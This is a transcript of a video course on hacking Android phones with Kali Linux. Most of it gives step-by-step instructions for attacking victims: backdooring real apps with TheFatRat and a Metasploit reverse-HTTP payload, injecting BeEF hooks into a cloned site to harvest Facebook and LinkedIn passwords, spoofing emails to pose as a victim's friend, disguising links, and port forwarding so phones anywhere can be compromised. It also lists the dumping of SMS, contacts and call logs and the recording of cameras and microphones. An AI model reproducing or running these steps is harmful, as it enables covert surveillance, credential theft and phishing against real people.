Hello guys, welcome to my course Android Hacking and Security using Kali Linux. My name is Rashid Zeb. I am an ethical hacker and a software developer. In this course, I will be teaching you how to hack Android devices from scratch. Everybody has a smartphone nowadays and they keep all of their important data on it like photos, videos, emails, contacts, and the most alarming thing is these devices are not as secure as our personal computers. It is actually very easy to hack these devices. In this course, we are going to start from very basic tasks like making your own penetration testing lab, so you don't need to have any prior knowledge about this topic. Furthermore, it is going to be very detailed and practical course. For example, I'm going to teach you from basic operations in Kali Linux to making malicious payloads yourself. I will also teach you social engineering techniques and hacking devices outside local network. I have searched Udemy, but there was no course about hacking Android devices. In fact, there are some courses, but they only teach you Android application penetration testing. If you run into any trouble during the course or you have any question, please ask in the questions and answers section. I will always be there to help you. I just hope this course will help you learn something new. Thank you. Hello guys, we will now download VirtualBox. So just type in VirtualBox in your search engine and search for it. We will go to the official site and just make sure you are on the right site. Always look for the HTTPS. Alright, we will choose Windows host. If you're using Linux or OS X, go for those options. Start the download. Alright, we'll now start the installation. Just keep pressing next, we don't have to change anything in here. Alright, that's it, so see you in the next lecture. Now we are going to download Kali Linux VirtualBox image. Go to the downloads page and look for Kali Linux 64-bit VirtualBox image. Make sure you are not downloading the VMware image. Go to VirtualBox tab and select the 64-bit version. You can also download it via torrent. Start the download. I am gonna pause the video while it is downloading. Alright, the download has finished. Go to the downloaded folder and open the OVA file. It has opened a window. Here you can import the image to the VirtualBox. I am keeping the default settings, however only 1 GB of RAM and 1 CPU is enough for Kali Linux. Click the import button. That's it, Kali Linux is ready. We are going to install the latest version of Android OS on our VirtualBox. You can also use an Android phone which you don't use anymore, but do not use your personal phone. So search for Android Nougat ISO. Alright, there is official Android x86 site. We can download our ISO from these two sites. I'm gonna download it from foshub.com. Look for 64-bit ISO. Start the download. Alright, the download has finished. We are going to open VirtualBox. Click on New. Type the name. Select Linux from the drop-down menu. Now select other Linux 64-bit for version. Give it at least 1 GB RAM. Create a virtual hard disk now. Choose VirtualBox disk image. Choose dynamically allocated. Give it at least 10 GB of disk space and click Create. Now click Settings while Android 7 is highlighted. Go to Network tab and select Bridged Adapter from the drop-down menu. Now go to Storage and open the Android 7 ISO we just downloaded. Now go to System tab and change the pointing device to PS2 mouse. And click OK. Now click Start. We can also run this Android OS without installing it, but we are going to install it. Select No for this option and press Enter. Select New. Now select Primary and press Enter. Now press Enter to make this partition bootable. It will take a few seconds. Navigate to right option and press Enter. Here type Yes to proceed. Now select Quit and press Enter. Press OK. Choose the ext4 option and press OK. Select Yes and press Enter. Once again select Yes and press Enter. Now run Android 7. Set it up just like your Android phone. Sign in with your Gmail ID. Alright, that's it. We have installed Android 7 on VirtualBox. It is just like any Android phone. We can hack it without worrying about anything. Press right control key to release the mouse pointer to your host. To shut it down, go to Machine tab and click ACPI shutdown. Now click on power off. Alright, now we have to take a snapshot of our Android 7 OS, so open the VirtualBox, click on Android 7 and click snapshot. Click take to take the snapshot. Now go to settings, select the storage tab and remove the ISO file. So that's it. We have created our own hacking lab. In this lecture we are going to update our Kali Linux, but first of all we are going to take a snapshot. Now start your Kali machine. Your username will be root ROOT and your password will be TOOR. Open your terminal. Type apt-get space update. The download has finished. That's it. We have updated our Kali Linux. In this lecture we are going to download the Fat Rat, a tool that enables us to inject a malicious code into any Android application we want. So search the Fat Rat on your Kali Linux search engine. Here we are going to their official GitHub page. Click on the clone button. Copy the link. Open your terminal and type git clone and paste the link. It would clone the Fat Rat on our Kali machine. and the download is completed. Navigate to the Fed folder. We are going to set up our Fed, so type chmod +X and setup.sh. Press enter. If you ls now, setup.sh has been highlighted, which means we can now use the Fed. So type /setup.sh. It would download some dependencies. It is gonna take a while. Alright, it is checking its required programs. Most of the programs it requires are already available. It is downloading those programs that are not available in Kali Linux. Alright, it seems it has downloaded all the dependencies. It is updating the repository. So it is now ready. So type /fedred. It would check for all the programs it requires. Press enter. So we would be mostly using this option, number 5, backdooring original APKs, so we can backdoor any Android application. Your victim wouldn't even know that they have backdoor on their phone. Their application would work just perfect. So we are now going to exit. Alright, so we have installed the Fed on Kali Linux. In this lecture, I'm going to teach you how to get things done in Linux terminal. Some of you might ask, why should we use terminal instead of a graphical user interface? And the answer to that question is terminal is more powerful, easy to use, much quicker, and when you hack into a system, you would always need terminal to communicate to the compromised system. Once you are used to it, you would never prefer GUI again. Alright, so let's start by opening terminal. So this is your terminal. This is how it looks. I have changed its appearance. You can also change it by going to edit and profile preference. Alright, so here you can set the size of the window. You can change the colors. I often use green on black background. Alright. One of the very useful command is ifconfig. It shows you your IP. You type ifconfig. Alright, this is my IP. There's another command that is used to clear the terminal. So type clear and it clears your terminal. Another command that is very useful is pwd. It shows you your present working directory. So here you can see it shows you are in root directory. There's another command that lists all the content of the directory. The command is ls. So here you can see these are all the contents that are stored in our root directory. Another command is cd that is used to change directories. For example, if you want to go from root to downloads, you can use cd downloads. Alright, now I'm in download directory. If we type ls, you can see we have another directory VPN book over here. If you want to go back to the root, you can type cd and it would get you back to the root directory. Another very useful command is mkdir that is used to make new directories. So type mkdir and we will name it new. Alright, if we type ls, here you can see our new directory has been created. Type cd new and type ls. It is empty, so we can quickly create a file by typing touch and the name of the file. I'm going to name it list. Alright, if you type ls, there you can see our file has been created. Now if you want to add some text to your newly created file, type nano list. Nano is a terminal based text editor. So I will type some text here. And to save it, press Ctrl X. Now press Y and press enter. Get is another very useful command that is used to display the text on terminal. So type get list. Here you can see the text we just added to our file. To copy a file from one directory to another directory, we use cp command. So type cp and path to the file, so we know our file is stored in root slash new slash name of the file and the destination path. Root slash downloads. Press enter. Go back to root. Now go to downloads. If we type ls, so here you can see the file has been copied to the downloads directory. If you want to move the file from one directory to another directory, we use mv. For example, we are moving this file from downloads directory to another directory. So type path of the file, it is root slash downloads slash name of the file list and the destination path. So we are going to move it to our desktop. So type root slash desktop. Here you can see the file has been moved from downloads directory to desktop. If we type ls, the list file is gone. Type ls. If you want to delete this file, type rm and the name of the file. If we type ls, file is deleted. It is empty again. Go back to root directory. If we type ls here, you can see the directory we have created. If you want to delete this directory, you cannot delete it with rm command. For example, rm new, and it would give you an error. Cannot remove new as a directory. So to remove a directory, type rm -r and then name of the directory. If we type ls, it is gone. So these are some basic commands we use in Kali Linux. Alright, open Firefox. Type best sports cars 2018. Alright, there is a site. If our victim like cars, this is the site he would like the most, so we are going to clone this one. Just copy the URL from the address bar. Now open up the terminal. Type httrake. Give a project name. Give it path. I'm going to store it in root in a directory named cloned site. Enter the URL and put a / in front of the URL. Select one. Just press enter, enter, enter. Type Y. Alright, our site has been cloned. We are going to copy our cloned site to the HTML folder. Our site will be in that folder. Copy this index.html to computer var www html. Delete existing files and paste a new index.html. Open the terminal. Clear the terminal and start the Apache server. Just to confirm it's running, we are going to type service Apache to status. Alright, you can see it here, active and running. Open Firefox and type your IP. This is our cloned site which looks exactly like the original one. If you click on any of the link, it will redirect to the original site, so our victim would never suspect it as a fake site. I will also be showing you how you can change this URL so that it look real. Alright, so we have cloned a site. In this lecture we are going to hack Android using Beef framework. Beef is a cross-site scripting framework that exploits the browsers. It uses JavaScript, so it works against all the browsers. In this attack we will send a web link to our victim, and when the victim opens the link we will get a backdoor access to his device. So let's start. Open terminal and start your Apache 2 server. We are going to close the terminal. Click on Beef icon. It will automatically open Firefox. Your username will be Beef and password would also be Beef. We are going to copy this script. Go to HTML directory. Other location, computer, var, www, HTML, and open the index.html with the monodevelop. We are going to paste our script right under the head tag. Change the IP, give it your local IP. Mine is 192.168.10.102. Save the change and close it. We have injected the Beef code in our HTML site. Open the cloned site on Android device. It is just a normal site, but if we come back to the Beef control panel, there you can see we have hooked the Android device. There are all the information about the device, version of Android it is running, and other stuff. We would be using the command tab. This is where all the commands we can execute on our victim's device. In social engineering, there is credential harvesting attack. Get username and passwords for a lot of sites like Facebook, LinkedIn. Select Facebook and execute. If you go back to the victim machine, you can see here a pop-up window has opened asking for username and password. If our victim's email is name@email.com and his password is 12345, if we press login, the pop-up window would disappear. But if we go back to our Kali machine, click on command 1, there you can see the username and his password. So this is how you can do credential harvesting attack using Beef. We can also use this for other sites like LinkedIn. Execute and go back to your Android machine. There you can see a pop-up window has opened asking for credentials. We would give our email and password. Go back to your Kali machine. Double click on command 2 and there you can see the email and password of our victim. There are a lot of other commands that you can use. For example, you can record audio, you can capture the screenshots, you can access the webcam, and much more. So spend some time using this tool and try all the commands. In this lecture, I will be teaching you how to backdoor actual Android applications. The only problem with this method is your victim needs to enable installation from unknown sources to install the backdoor application. But this issue can be solved with social engineering. We will discuss social engineering in detail in social engineering section. So let's start. Open Firefox. Type in your address bar apkpure.com. In the search box, type Dominoes. Right, the second one is a game. Download the APK. Start the download. The download has finished. Go to your downloads directory. Cut the Dominoes APK and paste it on the desktop. Rename the file to dominoes.apk. Now open your terminal. Type fatrate. If that doesn't work for you, navigate to the fatrate directory and there type fatrate. Press enter. Press enter. Alright, we are going to backdoor an APK, so type 5. Type your local IP, it is already showing you, so we can copy it and paste it here. Set your L port to 8080. Type the path to the APK file, root/desktop/ the file name. We are going to select 1 Android Interpreter Reverse HTTP. Type 1 Use backdoor APK. Alright, it is now creating the RAID APK file. It is decompiling the APK file. It is decompiling the original APK file. It takes some time, so be patient meanwhile. Alright, it is now recompiling the original APK with backdoor. Alright, our backdoored APK has been created and it is stored in this location. Copy it. We don't need the listener now, we will configure it manually, so type N and then enter. Now type 16 to exit. Press enter. Close your terminal. Go to your files. In the address bar type / and then paste the path we just copied. Remove the file name. Copy the backdoor APK to our HTML folder. Delete the index.html. Paste the APK and rename it to dominoes.apk. So we have created our own backdoor APK. In the next lecture, I would be teaching you how to configure multi-handler to listen for incoming connections. In this lecture, I am gonna show you how to configure Metasploit multi-handler to listen for incoming connections. So let's start. Open your terminal and type msf console. I'm already on a multi-handler, so for the first time you won't be here, so I'm gonna type bake to show you what you're gonna see. Now we are going to type use exploit / multi / handler. We are now on a multi-handler. Type options. Alright, you can see our payload options is already set to Android interpreter reverse HTTP. Our lhost is set to 192.168.10.8, so we are going to change it. Just type set lhost your local IP. I'm going to type 192.168.10.102. Our L port is already set to 8080. You can set it by typing set L port 8080. You can set payload by typing set payload android / interpreter / reverse HTTP. Just to confirm, we are going to type options again. And you can see here our payload option is Android interpreter reverse HTTP. Our lhost has been changed to 192.168.10.102. Alright, now just type exploit. Now we are going to our Android device. Open the Google Chrome browser. Type your Kali Linux IP. Mine is 192.168.10.102. There you can see the APK, so download it. Click OK. Our APK has been downloaded. Now open the APK. Our victim has to enable the unknown sources in the security settings. If we go to downloads, our APK is there. Double click APK. Install the game. Now open the game. Accept the terms of service and continue. Accept whatever it wants. Now continue. Alright, this is just a normal game to our victim, but if we come back to our Kali machine, you can see we have got a meterpreter session. We are going to type sysinfo, and there you can see our victim has Android 7.1.2. Just type help and you can see all the commands you can execute on your victim phone. Since I'm on virtual machine, some commands won't work because our device doesn't have a SIM card. It cannot send messages, it cannot make calls, it cannot capture pictures because it doesn't have permissions to camera and mic. But these are all the things you can do on your victim's phone. You can record mic, you can capture the screenshots, you can start a webcam chat, you can list the webcams, see how many cams are there. You can take a webcam snap, you can start a webcam stream, dump call log, you can dump the contacts, you can dump the SMS, you can geolocate your victim. You can also send SMS from your victim phone. If you type screenshot, it has stored the picture in root. Open your root and there is a screenshot it has taken from our victim phone. You can see it here. You can record mic. This doesn't work on our Android machine because it doesn't have access to a mic. Operation failed. You can list webcams. On an actual phone, you would see two cams, the front camera and the back camera. Since our Android machine doesn't have access to the webcams also, so it would say there were no webcams found. Alright, so that's it. Spend some time using this tool and try all the commands. In this lecture, I am gonna show you how to communicate to a hacked device using Armitage. Armitage has a graphical user interface, so you don't need to remember commands. It is easy to use and beginner friendly. but you should always try to use terminal because it is more powerful. So let's start. Open Armitage, click connect, click yes. Go to exploits and look for multi. Double click the handler. Type in your Kali Linux IP address for lhost and type 8080 for lport. For payload, type android/interpreter/reverse http and click launch. 192.168.10.7 is our Android machine. If you go to any of the interpreter session, there are all the attacks. You don't have to write commands. You can take screenshots, and there you can see it has took the screenshot from our Android phone. You can also browse files on your victim phone. Just type in the location, whatever you want to find. You can upload stuff to your victim phone, you can download things from there. So I'm going to download something, so go to the audio and ringtones must have some files. Yeah, it has an audio file. OGG is an audio format, so we are going to download it. Click download and it is saved. Alright, this is how it is done on Armitage. In this lecture, I'm gonna show you how to upload your backdoored APK to an online file hosting site. This method of file delivery is more useful when you are hacking phones remotely. In this lecture, I'm gonna use anonfile.com. However, you can use any free file hosting site. Open Firefox and type anonfile.com in your address bar. Click upload. Now select your backdoored APK which we have stored in our HTML directory. This is the link for our backdoored APK. You can send this link to anybody, and when they download the APK, you will get a backdoor access. In this lecture, I am gonna show you how to change any URL. You can also change your IP address to a URL to make it look more legitimate. So let's start. Copy the URL, open new tab and type bit.ly. Now paste the URL. Copy this link. Now you can send this link to your victim. It would look more legitimate this way. In this lecture, I am going to show you how to spoof emails. You can use any email. You can pretend to be your victim's friend. You can pretend to be someone from a big company, you can use any email address out there. So open Firefox and type emkei.cz. There are a lot of other sites, but I have been using this one for quite a while and it works best. So today we are going to use this one. Alright, so you can type in any name here. I'm just typing my own name. I'm just showing you how it works. You can pretend to be anyone. You can pretend to be your victim's friend. You can pretend to be your victim's family member or anybody, and you can suggest the backdoor application you have created, and once he downloads that application you will get access to his device, whether he's in your local network or he is outside your local network. It doesn't matter. I'm just using my own email address. I would send this email from one of my email address to my other email address just to show you how it works. Alright, so type in your victim email. Alright, so if you're pretending to be your victim's friend, you can type, yeah, this one should work. Check this amazing game. Now you can upload an APK directly to the email, and when he downloaded it you would get access to his device, and you can also send him a link. Type, check this amazing game, you will love it. Alright, and now paste the link. Prove that you are not a robot and click send. Alright, so our email has been sent. Open your Gmail app. Yeah, we have got the email. Let's check it out. It shows that it came from rashid@gmail.com, but I didn't send it. It is a spoofed mail. So now you can see you can spoof any email. You can pretend to be anyone using those sites. Now if I just click on the link, this is how your victim can download a backdoor APK, and when he downloads it, you will get a backdoor access to his device. If he know that the email came from his friend, he would definitely download it. And you can also use other social engineering techniques, like you can write, if he download and play the game from this site, he can win prizes. So that would definitely motivate him to download the game. So that's all. We have learned how to spoof email address. In this lecture we are going to configure our router to forward incoming connections to our Kali Linux machine. By default, our router doesn't allow incoming connections from devices that are outside our local network, but we are going to set up port forwarding that would forward all the incoming connections to our Kali Linux. So open Firefox and type in your router IP address or your gateway. My router's IP is 192.168.10.1. Your IP could be 192.168.1.1 because that is more common. Alright, type in your username and password. If you don't remember your router's username and password, check it on the back side of your router. Click OK. You should look for NAT and look for a virtual servers tab. On some routers it is listed as port forwarding. So whether it is virtual servers or port forwarding, it is the same thing. We need to add Kali Linux IP for port forwarding, so click add. We are going to add a custom and type in your Kali Linux IP address. My Kali Linux machine IP is 192.168.10.102. You enter your own. Alright, so we used the port 8080 in our payloads. So we are going to set up a rule for port 8080. Now click apply save. Alright, it has been added to the table. Now this is one method. The other method is easy, but some old routers doesn't support this option. Most modern routers support this option. So look for the DMZ host tab. Just enter your Kali Linux IP address and it would forward all the incoming connection, whether it is from port 8080 or port 80 or port 5000 or 4000 or port 443, anything. It would forward all the connections. So this method is hassle free. You just have to enter your Kali Linux IP address and click apply save. But remember to disable the port forwarding always once you are done, because it is basically a shield. Our router is shielding our machines in our local network. So once you are done, just remove your Kali Linux IP address and click save apply. Your router would stop forwarding connections to your Kali Linux. You can also delete your Kali Linux IP address from the virtual servers table. If it is called virtual servers, on some routers it is called port forwarding. So whatever it is the same thing. So just remove it once you are done. Alright, so that's it. We just learned how to configure our router to port forward incoming connections to our Kali Linux. To check your external IP, go to Firefox and type what is my IP address. And there you can see your IP address. You can see this is not the same as my local IP. My local IP is 192.168.10.102. Just copy it, close the Firefox. So go to Files, Other Location, Computer, var www html. Open index.html with monodevelop. Remove your local IP and paste your external IP, the one you copied from Google. Save it, close monodevelop, close the files. So this is how simple it is. Now you can hack your victims no matter wherever in the world they are. In this lecture I am going to show you how to hack Android devices on wide area network using the original backdoor APK. So let's start. Go to your terminal and type fatrate. Press enter, press enter again. We do the same thing as before. Type 5 and enter. But this time we are not going to use our local IPv4 address as it suggests. We are going to use the one we just copied from Google. You can check again. This is the IP address we are going to use. Open terminal. Paste your external IP. Set your L port to 8080. Give it the path just like before. Root, desktop, and the file name. We are going to take one Android interpreter reverse HTTP. One use backdoor APK. So all the steps are the same. The only difference is we use our external IP instead of our local IP. Everything else is the same as before. Alright, so it has stored a backdoor. Our previous backdoor was renamed to APK backdoor 713. This is the path to our new backdoor APK. We are going to type N, press enter, exit the fat rate, press enter. Now you can hack any Android device that are not in your local area network.